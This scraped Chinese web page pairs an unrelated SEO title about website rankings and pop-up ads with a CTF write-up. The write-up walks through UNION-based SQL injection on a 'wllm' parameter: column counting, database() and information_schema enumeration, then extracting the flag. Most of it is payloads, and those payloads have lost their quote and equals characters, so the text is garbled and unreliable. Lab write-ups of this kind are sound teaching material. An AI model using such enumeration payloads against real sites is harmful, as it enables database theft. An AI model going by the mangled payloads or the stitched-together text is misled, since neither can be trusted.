当前位置：首页 > news >正文

网站排名数据网站悬浮窗广告

news 2026/1/17 20:45:29

网站排名数据,网站悬浮窗广告,给图像做标注的网站,百度一下你就知道首页官网查看网页有提示#xff0c;参数是wllm#xff0c;并且要我们输入点东西所以#xff0c;我们尝试以get方式传入有回显#xff0c;但似乎没啥用从上图看应该是字符型漏洞#xff0c;单引号字符注入先查看字段数 /?wllm2order by 3-- 没回显报错了#xff0c;说明…查看网页有提示参数是wllm并且要我们输入点东西所以我们尝试以get方式传入有回显但似乎没啥用从上图看应该是字符型漏洞单引号字符注入先查看字段数 /?wllm2order by 3-- 没回显报错了说明字段数是3 然后查看回显点 /?wllm2union select 1,2,3-- 注意这里需要把wllm设置为不为1的数就是让他查不到数据就行因为wllm1查得到数据不然它只会输出wllm1查询到的数据。然后查看数据库名称 /?wllm2union select 1,2,database()-- 得到数据库名称就可以按顺序数据库-表-列来找flag了 /?wllm2union select 1,2,group_concat(table_name) from information_schema.tables where table_schematest_db-- ?wllm2union select 1,2,group_concat(column_name) from information_schema.columns where table_nametest_tb-- /?wllm2union select 1,2,flag from test_tb--

查看全文

http://www.w-s-a.com/news/784360/